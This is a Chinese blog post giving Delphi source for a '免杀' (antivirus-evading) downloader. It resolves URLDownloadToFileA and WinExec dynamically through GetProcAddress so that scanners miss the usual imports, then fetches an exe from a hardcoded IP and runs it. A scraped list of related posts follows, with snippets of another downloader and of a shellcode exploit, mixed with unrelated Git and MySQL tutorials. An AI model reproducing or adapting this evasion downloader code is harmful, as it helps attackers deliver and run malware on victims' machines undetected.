[源码]Delphi源码免杀之函数动态调用 实现免杀的下载者
- [免杀]Delphi源码免杀之函数动态调用 实现免杀的下载者
- 2013-12-30 23:44:21 来源:K8拉登哥哥's Blog
只是发出来给不懂的人入入门 也防止有新人老是来问
ShellApi,URLMon 单元
//Delphi动态调用API函数
procedure TForm1.Button1Click(Sender: TObject);
var
SourceFile:ansistring;
DestFile :ansistring;
down2:function(Caller: IUnknown; URL: PChar; FileName: PChar;
Longint: DWORD; StatusCB: IBindStatusCallback): Longint; stdcall;
exe2:function(lpCmdLine: LPCSTR; uCmdShow: LongWord): LongWord; stdcall;
begin
SourceFile:='http://172.16.126.152/UrlDown/k8team.exe';
DestFile := 'f:\bbbaa.exe';
//原函数 下载完就执行 典型的下载者 常用函数 是个杀软都会杀得你连路都不见
//UrlDownloadToFile(nil, PChar(SourceFile), PChar(DestFile), 0, nil);
//WinExec(Pchar(DestFile),SW_SHOW); //要和原函数对应
//动态调用
@Down2:=GetProcAddress(LoadLibrary('URLMON.DLL'),'URLDownloadToFileA');
Down2(nil, PChar(SourceFile), PChar(DestFile), 0, nil);
//动态调用
@exe2:=GetProcAddress(LoadLibrary('kernel32.dll'),'WinExec');
exe2(PChar(DestFile),SW_SHOW);
end;
//=================================================================================================================
附上函数原型
URLDownloadToFile 函数
function URLDownloadToFile; external UrlMonLib name 'URLDownloadToFileA';
UrlMonLib = 'URLMON.DLL';
function URLDownloadToFile(Caller: IUnknown; URL: PChar; FileName:
PChar; Reserved: DWORD; StatusCB: IBindStatusCallback): HResult;
stdcall;
WinExec函数
function WinExec; external kernel32 name 'WinExec';
kernel32 = 'kernel32.dll';
function WinExec(lpCmdLine: LPCSTR; uCmdShow: UINT): UINT; stdcall;
[源码]Delphi源码免杀之函数动态调用 实现免杀的下载者的更多相关文章
- Delphi DLL的创建、静态及动态调用
转载:http://blog.csdn.net/welcome000yy/article/details/7905463 结合这篇博客:http://www.cnblogs.com/xumenger/ ...
- [转]Delphi DLL的创建、静态 以及动态调用
第一章 DLL简单介绍 由于在目前的学习工作中,需要用到DLL文件,就学习了下,在这里作个总结. 首先装简单介绍下DLL: 1,减小可执行文件的大小 DLL技术的产生有很大一部分原因是为了减小可执行 ...
- [源码]Delphi 5KB无输入表下载者
[源码]Delphi 5KB无输入表下载者源码 PROGRAM Fun; type DWORD = LongWord; THandle = LongWord; BOOL = LongBool; LPC ...
- QQ2008自动聊天精灵delphi源码
QQ2008自动聊天精灵delphi源码 unit Unit1;interfaceuses Windows, Messages, SysUtils, Variants, Classes, Grap ...
- 转换GMT秒数为日期时间格式-Delphi源码
转换GMT秒数为日期时间格式-Delphi源码.收藏最近在写PE分析工具的时候,需要转换TimeDateStamp字段值为日期时间格式,这是Delphi的源码. //把GMT时间的秒数转换成日期时间格 ...
- http代理工具delphi源码
http://www.caihongnet.com/content/xingyexinwen/2013/0721/730.html http代理工具delphi源码 以下代码在 DELPHI7+IND ...
- [PHP源码阅读]trim、rtrim、ltrim函数
trim系列函数是用于去除字符串中首尾的空格或其他字符.ltrim函数只去除掉字符串首部的字符,rtrim函数只去除字符串尾部的字符. 我在github有对PHP源码更详细的注解.感兴趣的可以围观一下 ...
- EventBus源码解析 源码阅读记录
EventBus源码阅读记录 repo地址: greenrobot/EventBus EventBus的构造 双重加锁的单例. static volatile EventBus defaultInst ...
- ios源码-ios游戏源码-ios源码下载
游戏源码 一款休闲类的音乐小游戏源码 该源码实现了一款休闲类的音乐小游戏源码,该游戏的源码很简单,而且游戏的玩法也很容易学会,只要我们点击视图中的grid,就可以 人气:2943运行环境:/Xco ...
随机推荐
- oday获取系统最高权限的代码
import sys,sockettarget = sys.argv[1]shellcode = ("\x6a\x4f\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81 ...
- python爬虫知乎问答
python爬虫知乎问答 import cookielibimport base64import reimport hashlibimport jsonimport rsaimport binasci ...
- python 文件读写方式
一.普通文件读写方式 1.读取文件信息: with open('/path/to/file', 'r') as f: content = f.read() 2.写入文件中: with open('/U ...
- [leetcode]98. Validate Binary Search Tree验证二叉搜索树
Given a binary tree, determine if it is a valid binary search tree (BST). Assume a BST is defined as ...
- Git常用命令及场景
Git命令推送到远程分支 1.登录GitHub创建一个远程仓库. https://github.com 2.git init 本地创建一个目录,并初始化一个git仓库. 3.git add 添加文件到 ...
- Java多线程系列3 synchronized 关键词
先来看一个线程安全的例子 ,两个线程对count进行累加,共累加10万次. public class AddTest { public static void main(String[] args) ...
- Git的SSH-key生成、导入及使用
Git主要使用4种协议传输数据:本地协议,SSH协议,Git协议和HTTP/S协议. SSH协议是最为常用的一种,正式介绍SSH之前,简要说明一下其它协议. 本地协议(file://) 本地协议的优点 ...
- MySQL配置文件优化(Innodb)
Innodb配置文件参数调优 ——MySQL建议采用MySQL 5.6 InnoDB存储引擎 1.内存利用方面: innodb_buffer_pool_size ☆☆☆☆☆ Innodb优化首要参数. ...
- Python12/10--前端之display/overflow使用/清浮动的方式
display: 1.inline 同行显示,当一行显示不下.多余的就会换行显示, 不支持的css样式:不支持宽高,不支持行高(行高会映射给父级) 不支持margin上下,content由 文本内容撑 ...
- idea执行mapreduce报错 Could not locate Hadoop executable: C:\hadoop-3.1.1\bin\winutils.exe
window执行mapreduce报错 Exception in thread "main" java.lang.RuntimeException: java.io.FileNot ...